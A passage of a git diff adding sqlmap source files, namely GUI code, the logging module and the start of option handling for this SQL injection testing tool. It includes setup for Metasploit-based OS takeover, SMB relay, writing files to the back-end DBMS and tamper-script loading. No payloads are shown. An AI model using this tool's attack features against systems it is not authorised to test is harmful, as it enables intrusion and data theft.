queue.put(line) + + alive = False + stream.close() + + alive = True + + process = subprocess.Popen([sys.executable or "python", os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap.py"), "-c", configFile], shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, bufsize=1, close_fds=not IS_WIN) + + # Reference: https://stackoverflow.com/a/4896288 + queue = _queue.Queue() + thread = threading.Thread(target=enqueue, args=(process.stdout, queue)) + thread.daemon = True + thread.start() + + top = _tkinter.Toplevel() + top.title("Console") + + # Reference: https://stackoverflow.com/a/13833338 + text = _tkinter_scrolledtext.ScrolledText(top, undo=True) + text.bind("", onKeyPress) + text.bind("", onReturnPress) + text.pack() + text.focus() + + center(top) + + while True: + line = "" + try: + # line = queue.get_nowait() + line = queue.get(timeout=.1) + text.insert(_tkinter.END, line) + except _queue.Empty: + text.see(_tkinter.END) + text.update_idletasks() + + if not alive: + break + + menubar = _tkinter.Menu(window) + + filemenu = _tkinter.Menu(menubar, tearoff=0) + filemenu.add_command(label="Open", state=_tkinter.DISABLED) + filemenu.add_command(label="Save", state=_tkinter.DISABLED) + filemenu.add_separator() + filemenu.add_command(label="Exit", command=window.quit) + menubar.add_cascade(label="File", menu=filemenu) + + menubar.add_command(label="Run", command=run) + + helpmenu = _tkinter.Menu(menubar, tearoff=0) + helpmenu.add_command(label="Official site", command=lambda: webbrowser.open(SITE)) + helpmenu.add_command(label="Github pages", command=lambda: webbrowser.open(GIT_PAGE)) + helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE)) + helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE)) + helpmenu.add_separator() + helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2024\n\n (%s)" % DEV_EMAIL_ADDRESS)) + menubar.add_cascade(label="Help", menu=helpmenu) + + window.config(menu=menubar) + window._widgets = {} + + notebook = AutoresizableNotebook(window) + + first = None + frames = {} + + for group in parser.option_groups: + frame = frames[group.title] = _tkinter.Frame(notebook, width=200, height=200) + notebook.add(frames[group.title], text=group.title) + + _tkinter.Label(frame).grid(column=0, row=0, sticky=_tkinter.W) + + row = 1 + if group.get_description(): + _tkinter.Label(frame, text="%s:" % group.get_description()).grid(column=0, row=1, columnspan=3, sticky=_tkinter.W) + _tkinter.Label(frame).grid(column=0, row=2, sticky=_tkinter.W) + row += 2 + + for option in group.option_list: + _tkinter.Label(frame, text="%s " % parser.formatter._format_option_strings(option)).grid(column=0, row=row, sticky=_tkinter.W) + + if option.type == "string": + widget = _tkinter.Entry(frame) + elif option.type == "float": + widget = ConstrainedEntry(frame, regex=r"\A\d*\.?\d*\Z") + elif option.type == "int": + widget = ConstrainedEntry(frame, regex=r"\A\d*\Z") + else: + var = _tkinter.IntVar() + widget = _tkinter.Checkbutton(frame, variable=var) + widget.var = var + + first = first or widget + widget.grid(column=1, row=row, sticky=_tkinter.W) + + window._widgets[(option.dest, option.type)] = widget + + default = defaults.get(option.dest) + if default: + if hasattr(widget, "insert"): + widget.insert(0, default) + + _tkinter.Label(frame, text=" %s" % option.help).grid(column=2, row=row, sticky=_tkinter.W) + + row += 1 + + _tkinter.Label(frame).grid(column=0, row=row, sticky=_tkinter.W) + + notebook.pack(expand=1, fill="both") + notebook.enable_traversal() + + first.focus() + + window.mainloop() diff --git a/src/sqlmap-master/lib/core/log.py b/src/sqlmap-master/lib/core/log.py new file mode 100644 index 0000000..33e6a36 --- /dev/null +++ b/src/sqlmap-master/lib/core/log.py @@ -0,0 +1,116 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import logging +import re +import sys + +from lib.core.enums import CUSTOM_LOGGING + +logging.addLevelName(CUSTOM_LOGGING.PAYLOAD, "PAYLOAD") +logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_OUT, "TRAFFIC OUT") +logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_IN, "TRAFFIC IN") + +LOGGER = logging.getLogger("sqlmapLog") + +LOGGER_HANDLER = None +try: + from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler + + class _ColorizingStreamHandler(ColorizingStreamHandler): + def colorize(self, message, levelno, force=False): + if levelno in self.level_map and (self.is_tty or force): + bg, fg, bold = self.level_map[levelno] + params = [] + + if bg in self.color_map: + params.append(str(self.color_map[bg] + 40)) + + if fg in self.color_map: + params.append(str(self.color_map[fg] + 30)) + + if bold: + params.append('1') + + if params and message: + match = re.search(r"\A(\s+)", message) + prefix = match.group(1) if match else "" + message = message[len(prefix):] + + match = re.search(r"\[([A-Z ]+)\]", message) # log level + if match: + level = match.group(1) + if message.startswith(self.bold): + message = message.replace(self.bold, "") + reset = self.reset + self.bold + params.append('1') + else: + reset = self.reset + message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1) + + match = re.search(r"\A\s*\[([\d:]+)\]", message) # time + if match: + time = match.group(1) + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, self._reset(message))), 1) + + match = re.search(r"\[(#\d+)\]", message) # counter + if match: + counter = match.group(1) + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, self._reset(message))), 1) + + if level != "PAYLOAD": + if any(_ in message for _ in ("parsed DBMS error message",)): + match = re.search(r": '(.+)'", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + match = re.search(r"\bresumed: '(.+\.\.\.)", message) + if match: + string = match.group(1) + message = message.replace("'%s" % string, "'%s" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + match = re.search(r" \('(.+)'\)\Z", message) or re.search(r"output: '(.+)'\Z", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) + + if prefix: + message = "%s%s" % (prefix, message) + + message = message.replace("%s]" % self.bold, "]%s" % self.bold) # dirty patch + + return message + + disableColor = False + + for argument in sys.argv: + if "disable-col" in argument: + disableColor = True + break + + if disableColor: + LOGGER_HANDLER = logging.StreamHandler(sys.stdout) + else: + LOGGER_HANDLER = _ColorizingStreamHandler(sys.stdout) + LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False) + LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False) + LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False) +except ImportError: + LOGGER_HANDLER = logging.StreamHandler(sys.stdout) + +FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S") + +LOGGER_HANDLER.setFormatter(FORMATTER) +LOGGER.addHandler(LOGGER_HANDLER) +LOGGER.setLevel(logging.INFO) diff --git a/src/sqlmap-master/lib/core/option.py b/src/sqlmap-master/lib/core/option.py new file mode 100644 index 0000000..537d93f --- /dev/null +++ b/src/sqlmap-master/lib/core/option.py @@ -0,0 +1,2948 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import codecs +import functools +import glob +import inspect +import logging +import os +import random +import re +import socket +import sys +import tempfile +import threading +import time +import traceback + +from lib.controller.checks import checkConnection +from lib.core.common import Backend +from lib.core.common import boldifyMessage +from lib.core.common import checkFile +from lib.core.common import dataToStdout +from lib.core.common import decodeStringEscape +from lib.core.common import fetchRandomAgent +from lib.core.common import filterNone +from lib.core.common import findLocalPort +from lib.core.common import findPageForms +from lib.core.common import getConsoleWidth +from lib.core.common import getFileItems +from lib.core.common import getFileType +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString +from lib.core.common import intersect +from lib.core.common import normalizePath +from lib.core.common import ntToPosixSlashes +from lib.core.common import openFile +from lib.core.common import parseRequestFile +from lib.core.common import parseTargetDirect +from lib.core.common import paths +from lib.core.common import randomStr +from lib.core.common import readCachedFileContent +from lib.core.common import readInput +from lib.core.common import resetCookieJar +from lib.core.common import runningAsAdmin +from lib.core.common import safeExpandUser +from lib.core.common import safeFilepathEncode +from lib.core.common import saveConfig +from lib.core.common import setColor +from lib.core.common import setOptimize +from lib.core.common import setPaths +from lib.core.common import singleTimeWarnMessage +from lib.core.common import urldecode +from lib.core.compat import cmp +from lib.core.compat import round +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import mergedOptions +from lib.core.data import queries +from lib.core.datatype import AttribDict +from lib.core.datatype import InjectionDict +from lib.core.datatype import OrderedSet +from lib.core.defaults import defaults +from lib.core.dicts import DBMS_DICT +from lib.core.dicts import DUMP_REPLACEMENTS +from lib.core.enums import ADJUST_TIME_DELAY +from lib.core.enums import AUTH_TYPE +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import DUMP_FORMAT +from lib.core.enums import FORK +from lib.core.enums import HTTP_HEADER +from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.enums import MOBILES +from lib.core.enums import OPTION_TYPE +from lib.core.enums import PAYLOAD +from lib.core.enums import PRIORITY +from lib.core.enums import PROXY_TYPE +from lib.core.enums import REFLECTIVE_COUNTER +from lib.core.enums import WIZARD +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapInstallationException +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import SqlmapMissingMandatoryOptionException +from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapSilentQuitException +from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapSystemException +from lib.core.exception import SqlmapUnsupportedDBMSException +from lib.core.exception import SqlmapUserQuitException +from lib.core.exception import SqlmapValueException +from lib.core.log import FORMATTER +from lib.core.optiondict import optDict +from lib.core.settings import CODECS_LIST_PAGE +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR +from lib.core.settings import DBMS_ALIASES +from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.settings import DEFAULT_PAGE_ENCODING +from lib.core.settings import DEFAULT_TOR_HTTP_PORTS +from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS +from lib.core.settings import DEFAULT_USER_AGENT +from lib.core.settings import DUMMY_URL +from lib.core.settings import IGNORE_CODE_WILDCARD +from lib.core.settings import IS_WIN +from lib.core.settings import KB_CHARS_BOUNDARY_CHAR +from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET +from lib.core.settings import LOCALHOST +from lib.core.settings import MAX_CONNECT_RETRIES +from lib.core.settings import MAX_NUMBER_OF_THREADS +from lib.core.settings import NULL +from lib.core.settings import PARAMETER_SPLITTING_REGEX +from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT +from lib.core.settings import PROXY_ENVIRONMENT_VARIABLES +from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE +from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX +from lib.core.settings import SUPPORTED_DBMS +from lib.core.settings import SUPPORTED_OS +from lib.core.settings import TIME_DELAY_CANDIDATES +from lib.core.settings import UNKNOWN_DBMS_VERSION +from lib.core.settings import URI_INJECTABLE_REGEX +from lib.core.threads import getCurrentThreadData +from lib.core.threads import setDaemon +from lib.core.update import update +from lib.parse.configfile import configFileParser +from lib.parse.payloads import loadBoundaries +from lib.parse.payloads import loadPayloads +from lib.request.basic import checkCharEncoding +from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler +from lib.request.chunkedhandler import ChunkedHandler +from lib.request.connect import Connect as Request +from lib.request.dns import DNSServer +from lib.request.httpshandler import HTTPSHandler +from lib.request.pkihandler import HTTPSPKIAuthHandler +from lib.request.rangehandler import HTTPRangeHandler +from lib.request.redirecthandler import SmartRedirectHandler +from lib.utils.crawler import crawl +from lib.utils.deps import checkDependencies +from lib.utils.har import HTTPCollectorFactory +from lib.utils.purge import purge +from lib.utils.search import search +from thirdparty import six +from thirdparty.keepalive import keepalive +from thirdparty.multipart import multipartpost +from thirdparty.six.moves import collections_abc as _collections +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import http_cookiejar as _http_cookiejar +from thirdparty.six.moves import urllib as _urllib +from thirdparty.socks import socks +from xml.etree.ElementTree import ElementTree + +authHandler = _urllib.request.BaseHandler() +chunkedHandler = ChunkedHandler() +httpsHandler = HTTPSHandler() +keepAliveHandler = keepalive.HTTPHandler() +proxyHandler = _urllib.request.ProxyHandler() +redirectHandler = SmartRedirectHandler() +rangeHandler = HTTPRangeHandler() +multipartPostHandler = multipartpost.MultipartPostHandler() + +# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html +try: + WindowsError +except NameError: + WindowsError = None + +def _loadQueries(): + """ + Loads queries from 'xml/queries.xml' file. + """ + + def iterate(node, retVal=None): + class DictObject(object): + def __init__(self): + self.__dict__ = {} + + def __contains__(self, name): + return name in self.__dict__ + + if retVal is None: + retVal = DictObject() + + for child in node.findall("*"): + instance = DictObject() + retVal.__dict__[child.tag] = instance + if child.attrib: + instance.__dict__.update(child.attrib) + else: + iterate(child, instance) + + return retVal + + tree = ElementTree() + try: + tree.parse(paths.QUERIES_XML) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + + for node in tree.findall("*"): + queries[node.attrib['value']] = iterate(node) + +def _setMultipleTargets(): + """ + Define a configuration parameter if we are running in multiple target + mode. + """ + + initialTargetsCount = len(kb.targets) + seen = set() + + if not conf.logFile: + return + + debugMsg = "parsing targets list from '%s'" % conf.logFile + logger.debug(debugMsg) + + if not os.path.exists(conf.logFile): + errMsg = "the specified list of targets does not exist" + raise SqlmapFilePathException(errMsg) + + if checkFile(conf.logFile, False): + for target in parseRequestFile(conf.logFile): + url, _, data, _, _ = target + key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data)) + if key not in seen: + kb.targets.add(target) + seen.add(key) + + elif os.path.isdir(conf.logFile): + files = os.listdir(conf.logFile) + files.sort() + + for reqFile in files: + if not re.search(r"([\d]+)\-request", reqFile): + continue + + for target in parseRequestFile(os.path.join(conf.logFile, reqFile)): + url, _, data, _, _ = target + key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data)) + if key not in seen: + kb.targets.add(target) + seen.add(key) + + else: + errMsg = "the specified list of targets is not a file " + errMsg += "nor a directory" + raise SqlmapFilePathException(errMsg) + + updatedTargetsCount = len(kb.targets) + + if updatedTargetsCount > initialTargetsCount: + infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount) + infoMsg += "(parameter unique) requests from the " + infoMsg += "targets list ready to be tested" + logger.info(infoMsg) + +def _adjustLoggingFormatter(): + """ + Solves problem of line deletition caused by overlapping logging messages + and retrieved data info in inference mode + """ + + if hasattr(FORMATTER, '_format'): + return + + def format(record): + message = FORMATTER._format(record) + message = boldifyMessage(message) + if kb.get("prependFlag"): + message = "\n%s" % message + kb.prependFlag = False + return message + + FORMATTER._format = FORMATTER.format + FORMATTER.format = format + +def _setRequestFromFile(): + """ + This function checks if the way to make a HTTP request is through supplied + textual file, parses it and saves the information into the knowledge base. + """ + + if conf.requestFile: + for requestFile in re.split(PARAMETER_SPLITTING_REGEX, conf.requestFile): + requestFile = safeExpandUser(requestFile) + url = None + seen = set() + + if not checkFile(requestFile, False): + errMsg = "specified HTTP request file '%s' " % requestFile + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) + + infoMsg = "parsing HTTP request from '%s'" % requestFile + logger.info(infoMsg) + + for target in parseRequestFile(requestFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + if len(kb.targets) > 1: + conf.multipleTargets = True + seen.add(url) + + if url is None: + errMsg = "specified file '%s' " % requestFile + errMsg += "does not contain a usable HTTP request (with parameters)" + raise SqlmapDataException(errMsg) + + if conf.secondReq: + conf.secondReq = safeExpandUser(conf.secondReq) + + if not checkFile(conf.secondReq, False): + errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) + + infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq + logger.info(infoMsg) + + try: + target = next(parseRequestFile(conf.secondReq, False)) + kb.secondReq = target + except StopIteration: + errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq + errMsg += "does not contain a valid HTTP request" + raise SqlmapDataException(errMsg) + +def _setCrawler(): + if not conf.crawlDepth: + return + + if not conf.bulkFile: + if conf.url: + crawl(conf.url) + elif conf.requestFile and kb.targets: + target = next(iter(kb.targets)) + crawl(target[0], target[2], target[3]) + +def _doSearch(): + """ + This function performs search dorking, parses results + and saves the testable hosts into the knowledge base. + """ + + if not conf.googleDork: + return + + kb.data.onlyGETs = None + + def retrieve(): + links = search(conf.googleDork) + + if not links: + errMsg = "unable to find results for your " + errMsg += "search dork expression" + raise SqlmapGenericException(errMsg) + + for link in links: + link = urldecode(link) + if re.search(r"(.*?)\?(.+)", link) or conf.forms: + kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) + elif re.search(URI_INJECTABLE_REGEX, link, re.I): + if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork: + message = "do you want to scan only results containing GET parameters? [Y/n] " + kb.data.onlyGETs = readInput(message, default='Y', boolean=True) + if not kb.data.onlyGETs or conf.googleDork: + kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) + + return links + + while True: + links = retrieve() + + if kb.targets: + infoMsg = "found %d results for your " % len(links) + infoMsg += "search dork expression" + + if not conf.forms: + infoMsg += ", " + + if len(links) == len(kb.targets): + infoMsg += "all " + else: + infoMsg += "%d " % len(kb.targets) + + infoMsg += "of them are testable targets" + + logger.info(infoMsg) + break + + else: + message = "found %d results " % len(links) + message += "for your search dork expression, but none of them " + message += "have GET parameters to test for SQL injection. " + message += "Do you want to skip to the next result page? [Y/n]" + + if not readInput(message, default='Y', boolean=True): + raise SqlmapSilentQuitException + else: + conf.googlePage += 1 + +def _setStdinPipeTargets(): + if conf.url: + return + + if isinstance(conf.stdinPipe, _collections.Iterable): + infoMsg = "using 'STDIN' for parsing targets list" + logger.info(infoMsg) + + class _(object): + def __init__(self): + self.__rest = OrderedSet() + + def __iter__(self): + return self + + def __next__(self): + return self.next() + + def next(self): + try: + line = next(conf.stdinPipe) + except (IOError, OSError, TypeError): + line = None + + if line: + match = re.search(r"\b(https?://[^\s'\"]+|[\w.]+\.\w{2,3}[/\w+]*\?[^\s'\"]+)", line, re.I) + if match: + return (match.group(0), conf.method, conf.data, conf.cookie, None) + elif self.__rest: + return self.__rest.pop() + + raise StopIteration() + + def add(self, elem): + self.__rest.add(elem) + + kb.targets = _() + +def _setBulkMultipleTargets(): + if not conf.bulkFile: + return + + conf.bulkFile = safeExpandUser(conf.bulkFile) + + infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile + logger.info(infoMsg) + + if not checkFile(conf.bulkFile, False): + errMsg = "the specified bulk file " + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) + + found = False + for line in getFileItems(conf.bulkFile): + if conf.scope and not re.search(conf.scope, line, re.I): + continue + + if re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line or conf.data: + found = True + kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) + + if not found and not conf.forms and not conf.crawlDepth: + warnMsg = "no usable links found (with GET parameters)" + logger.warning(warnMsg) + +def _findPageForms(): + if not conf.forms or conf.crawlDepth: + return + + if conf.url and not checkConnection(): + return + + found = False + infoMsg = "searching for forms" + logger.info(infoMsg) + + if not any((conf.bulkFile, conf.googleDork)): + page, _, _ = Request.queryPage(content=True, ignoreSecondOrder=True) + if findPageForms(page, conf.url, True, True): + found = True + else: + if conf.bulkFile: + targets = getFileItems(conf.bulkFile) + elif conf.googleDork: + targets = [_[0] for _ in kb.targets] + kb.targets.clear() + else: + targets = [] + + for i in xrange(len(targets)): + try: + target = targets[i].strip() + + if not re.search(r"(?i)\Ahttp[s]*://", target): + target = "http://%s" % target + + page, _, _ = Request.getPage(url=target.strip(), cookie=conf.cookie, crawling=True, raise404=False) + if findPageForms(page, target, False, True): + found = True + + if conf.verbose in (1, 2): + status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) + except KeyboardInterrupt: + break + except Exception as ex: + errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex)) + logger.error(errMsg) + + if not found: + warnMsg = "no forms found" + logger.warning(warnMsg) + +def _setDBMSAuthentication(): + """ + Check and set the DBMS authentication credentials to run statements as + another user, not the session user + """ + + if not conf.dbmsCred: + return + + debugMsg = "setting the DBMS authentication credentials" + logger.debug(debugMsg) + + match = re.search(r"^(.+?):(.*?)$", conf.dbmsCred) + + if not match: + errMsg = "DBMS authentication credentials value must be in format " + errMsg += "username:password" + raise SqlmapSyntaxException(errMsg) + + conf.dbmsUsername = match.group(1) + conf.dbmsPassword = match.group(2) + +def _setMetasploit(): + if not conf.osPwn and not conf.osSmb and not conf.osBof: + return + + debugMsg = "setting the takeover out-of-band functionality" + logger.debug(debugMsg) + + msfEnvPathExists = False + + if IS_WIN: + try: + __import__("win32file") + except ImportError: + errMsg = "sqlmap requires third-party module 'pywin32' " + errMsg += "in order to use Metasploit functionalities on " + errMsg += "Windows. You can download it from " + errMsg += "'https://github.com/mhammond/pywin32'" + raise SqlmapMissingDependence(errMsg) + + if not conf.msfPath: + for candidate in os.environ.get("PATH", "").split(';'): + if all(_ in candidate for _ in ("metasploit", "bin")): + conf.msfPath = os.path.dirname(candidate.rstrip('\\')) + break + + if conf.osSmb: + isAdmin = runningAsAdmin() + + if not isAdmin: + errMsg = "you need to run sqlmap as an administrator " + errMsg += "if you want to perform a SMB relay attack because " + errMsg += "it will need to listen on a user-specified SMB " + errMsg += "TCP port for incoming connection attempts" + raise SqlmapMissingPrivileges(errMsg) + + if conf.msfPath: + for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")): + if any(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfcli", "msfconsole")): + msfEnvPathExists = True + if all(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfvenom",)): + kb.oldMsf = False + elif all(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfencode", "msfpayload")): + kb.oldMsf = True + else: + msfEnvPathExists = False + + conf.msfPath = path + break + + if msfEnvPathExists: + debugMsg = "provided Metasploit Framework path " + debugMsg += "'%s' is valid" % conf.msfPath + logger.debug(debugMsg) + else: + warnMsg = "the provided Metasploit Framework path " + warnMsg += "'%s' is not valid. The cause could " % conf.msfPath + warnMsg += "be that the path does not exists or that one " + warnMsg += "or more of the needed Metasploit executables " + warnMsg += "within msfcli, msfconsole, msfencode and " + warnMsg += "msfpayload do not exist" + logger.warning(warnMsg) + else: + warnMsg = "you did not provide the local path where Metasploit " + warnMsg += "Framework is installed" + logger.warning(warnMsg) + + if not msfEnvPathExists: + warnMsg = "sqlmap is going to look for Metasploit Framework " + warnMsg += "installation inside the environment path(s)" + logger.warning(warnMsg) + + envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":") + + for envPath in envPaths: + envPath = envPath.replace(";", "") + + if any(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfcli", "msfconsole")): + msfEnvPathExists = True + if all(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfvenom",)): + kb.oldMsf = False + elif all(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfencode", "msfpayload")): + kb.oldMsf = True + else: + msfEnvPathExists = False + + if msfEnvPathExists: + infoMsg = "Metasploit Framework has been found " + infoMsg += "installed in the '%s' path" % envPath + logger.info(infoMsg) + + conf.msfPath = envPath + + break + + if not msfEnvPathExists: + errMsg = "unable to locate Metasploit Framework installation. " + errMsg += "You can get it at 'https://www.metasploit.com/download/'" + raise SqlmapFilePathException(errMsg) + +def _setWriteFile(): + if not conf.fileWrite: + return + + debugMsg = "setting the write file functionality" + logger.debug(debugMsg) + + if not os.path.exists(conf.fileWrite): + errMsg = "the provided local file '%s' does not exist" % conf.fileWrite + raise SqlmapFilePathException(errMsg) + + if not conf.fileDest: + errMsg = "you did not provide the back-end DBMS absolute path " + errMsg += "where you want to write the local file '%s'" % conf.fileWrite + raise SqlmapMissingMandatoryOptionException(errMsg) + + conf.fileWriteType = getFileType(conf.fileWrite) + +def _setOS(): + """ + Force the back-end DBMS operating system option. + """ + + if not conf.os: + return + + if conf.os.lower() not in SUPPORTED_OS: + errMsg = "you provided an unsupported back-end DBMS operating " + errMsg += "system. The supported DBMS operating systems for OS " + errMsg += "and file system access are %s. " % ', '.join([o.capitalize() for o in SUPPORTED_OS]) + errMsg += "If you do not know the back-end DBMS underlying OS, " + errMsg += "do not provide it and sqlmap will fingerprint it for " + errMsg += "you." + raise SqlmapUnsupportedDBMSException(errMsg) + + debugMsg = "forcing back-end DBMS operating system to user defined " + debugMsg += "value '%s'" % conf.os + logger.debug(debugMsg) + + Backend.setOs(conf.os) + +def _setTechnique(): + validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1]) + validLetters = [_[0][0].upper() for _ in validTechniques] + + if conf.technique and isinstance(conf.technique, six.string_types): + _ = [] + + for letter in conf.technique.upper(): + if letter not in validLetters: + errMsg = "value for --technique must be a string composed " + errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters) + errMsg += "user's manual for details" + raise SqlmapSyntaxException(errMsg) + + for validTech, validInt in validTechniques: + if letter == validTech[0]: + _.append(validInt) + break + + conf.technique = _ + +def _setDBMS(): + """ + Force the back-end DBMS option. + """ + + if not conf.dbms: + return + + debugMsg = "forcing back-end DBMS to user defined value" + logger.debug(debugMsg) + + conf.dbms = conf.dbms.lower() + regex = re.search(r"%s ([\d\.]+)" % ("(%s)" % "|".join(SUPPORTED_DBMS)), conf.dbms, re.I) + + if regex: + conf.dbms = regex.group(1) + Backend.setVersion(regex.group(2)) + + if conf.dbms not in SUPPORTED_DBMS: + errMsg = "you provided an unsupported back-end database management " + errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted((_ for _ in (list(DBMS_DICT) + getPublicTypeMembers(FORK, True))), key=str.lower)) + errMsg += "If you do not know the back-end DBMS, do not provide " + errMsg += "it and sqlmap will fingerprint it for you." + raise SqlmapUnsupportedDBMSException(errMsg) + + for dbms, aliases in DBMS_ALIASES: + if conf.dbms in aliases: + conf.dbms = dbms + + break + +def _listTamperingFunctions(): + """ + Lists available tamper functions + """ + + if conf.listTampers: + infoMsg = "listing available tamper scripts\n" + logger.info(infoMsg) + + for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))): + content = openFile(script, "rb").read() + match = re.search(r'(?s)__priority__.+"""(.+)"""', content) + if match: + comment = match.group(1).strip() + dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip()))) + +def _setTamperingFunctions(): + """ + Loads tampering functions from given script(s) + """ + + if conf.tamper: + last_priority = PRIORITY.HIGHEST + check_priority = True + resolve_priorities = False + priorities = [] + + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): + found = False + + path = safeFilepathEncode(paths.SQLMAP_TAMPER_PATH) + script = safeFilepathEncode(script.strip()) + + try: + if not script: + continue + + elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)): + script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script) + + elif not os.path.exists(script): + errMsg = "tamper script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) + + elif not script.endswith(".py"): + errMsg = "tamper script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--tamper'" + raise SqlmapSyntaxException(errMsg) + + dirname, filename = os.path.split(script) + dirname = os.path.abspath(dirname) + + infoMsg = "loading tamper module '%s'" % filename[:-3] + logger.info(infoMsg) + + if not os.path.exists(os.path.join(dirname, "__init__.py")): + errMsg = "make sure that there is an empty file '__init__.py' " + errMsg += "inside of tamper scripts directory '%s'" % dirname + raise SqlmapGenericException(errMsg) + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (getUnicode(filename[:-3]), 